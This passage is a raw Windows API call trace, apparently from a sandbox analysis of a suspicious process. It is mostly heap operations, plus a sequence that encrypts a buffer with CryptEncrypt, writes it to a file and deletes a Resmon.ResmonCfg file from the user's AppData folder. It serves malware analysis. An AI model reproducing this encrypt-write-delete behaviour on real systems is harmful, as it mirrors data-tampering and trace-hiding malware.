returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0200.235] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad08 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.236] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a9fa80 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaca8 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab58 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadc8 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0200.237] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabe8 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab70 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac48 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0200.237] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0200.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0200.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaab58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0200.238] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1db5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x1db8) returned 1 [0200.238] CharLowerBuffW (in: lpsz="byte[7608]", cchLength=0xa | out: lpsz="byte[7608]") returned 0xa [0200.238] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.238] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.238] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0200.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaaca8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0200.238] CryptEncrypt (in: hKey=0x9e2238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a9fa80*, pdwDataLen=0x8cef60*=0x1db5, dwBufLen=0x1db8 | out: pbData=0x2a9fa80*, pdwDataLen=0x8cef60*=0x1db8) returned 1 [0200.239] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0200.239] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0200.239] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0200.239] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0200.239] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0200.239] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0200.240] WriteFile (in: hFile=0x4ec, lpBuffer=0x2a9bf00*, nNumberOfBytesToWrite=0x1db8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a9bf00*, lpNumberOfBytesWritten=0x8cf5e4*=0x1db8, lpOverlapped=0x0) returned 1 [0200.241] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0200.241] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0200.241] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.241] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.241] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0200.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa8a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0200.241] CryptDestroyKey (hKey=0x9e2238) returned 1 [0200.241] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0200.241] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0200.241] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0200.241] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0200.253] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0200.253] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0200.253] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0200.253] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0200.253] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0200.253] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0200.253] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0200.253] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0200.253] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.253] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.253] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0200.253] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0200.253] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0200.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0200.254] CryptReleaseContext (hProv=0xa7be68, dwFlags=0x0) returned 1 [0200.254] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0200.254] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0200.254] FreeLibrary (hLibModule=0x76390000) returned 1 [0200.254] CloseHandle (hObject=0x4b0) returned 1 [0200.255] CloseHandle (hObject=0x4ec) returned 1 [0200.257] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.257] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0200.257] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Resmon.ResmonCfg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg", lpFilePart=0x8cedf4*="Resmon.ResmonCfg") returned 0x2e [0200.258] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\resmon.resmoncfg")) returned 0x20 [0200.258] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6f6a4d1, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x1db5, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Resmon.ResmonCfg", cAlternateFileName="RESMON~1.RES")) returned 0x9e1cf8 [0200.258] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\resmon.resmoncfg")) returned 1 [0200.259] FindNextFileW (in: hFindFile=0x9e1cf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6f6a4d1, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0xb6f6a4d1, ftLastAccessTime.dwHighDateTime=0x1d5d815, ftLastWriteTime.dwLowDateTime=0xb6f6a4d1, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x1db5, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Resmon.ResmonCfg", cAlternateFileName="RESMON~1.RES")) returned 0 [0200.260] FindClose (in: hFindFile=0x9e1cf8 | out: hFindFile=0x9e1cf8) returned 1 [0200.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0200.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0200.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0200.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0200.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0200.261] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0200.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0200.261] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0200.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0200.261] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0200.261] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0200.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0200.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0200.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0200.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0200.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0200.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0200.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0200.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0200.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0200.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0200.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0200.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0200.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0200.262] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0200.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0200.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0200.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0200.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0200.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0200.263] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5e) returned 0x2a74df8 [0200.263] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Resmon.ResmonCfg", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg", lpFilePart=0x8cf650*="Resmon.ResmonCfg") returned 0x2e [0200.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74df8 | out: hHeap=0x2af0000) returned 1 [0200.263] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Resmon.ResmonCfg" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\resmon.resmoncfg")) returned 0xffffffff [0200.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0200.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0200.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0200.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0200.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0200.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0200.263] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.263] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0200.263] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0200.263] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, 